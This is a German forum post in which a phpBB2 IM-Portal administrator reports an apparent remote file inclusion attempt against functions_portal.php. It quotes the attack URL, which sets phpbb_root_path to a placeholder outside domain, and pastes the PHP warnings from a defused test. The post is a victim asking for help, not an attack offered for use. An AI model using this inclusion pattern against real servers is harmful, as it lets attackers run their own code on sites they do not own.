ich bin mir nicht ganz sicher, aber allem Anschein nach wurde versucht ueber mein IM-Portal eines phpbbb2 SPAM Mails oder aehnliches zu verschicken. Die Schwachstelle dabei ist die include functions_portal.php
ueber die URL
http://[domain]//includes/functions_portal.php?phpbb_root_path=http://[fremdeDomain]/[injection.text]??
scheint ein Angriff moeglich zu sein.
Ich moechte hier nicht zuviele Details nennen, weil ich mir unsicher bin.
Ich bin darauf gestossen weil ich ein Haufen eMails bekommen habe die diesen String enthielten.
Ich habe mit einer entschaerften URL einmal ausprobiert wie das Board darauf reagiert und bekam zurueck:
Code: Alles auswählen
Warning: main() [function.main]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /[host_Verzeichnis]/[Domain]/forum/includes/functions_portal.php on line 22
Warning: main(http://[fremdeDomain].deincludes/lite.) [function.main]: failed to open stream: Success in /[hostVerzeichnis]/[Domain]/forum/includes/functions_portal.php on line 22
Warning: main() [function.include]: Failed opening 'http://[femdeDomain].deincludes/lite.' for inclusion (include_path='.:/usr/local/lib/php') in /kunden/[Domain]/forum/includes/functions_portal.php on line 22
Fatal error: Cannot instantiate non-existent class: cache_lite in /[hostVerzeichnis]/[Domain]/forum/includes/functions_portal.php on line 27Dabei wird doch in der function ausdruecklich der include_once($phpbb_root_path . 'includes/lite.'.$phpEx);
phpbb_root_path eingesetzt. Oder versteh ich das verkehrt?
Ist das ganz vielleicht ein simpler SPAM Trick um Besucher auf die [fremdDomain]/[injection.txt] zu locken?
mit freundlichem Gruss,
yt
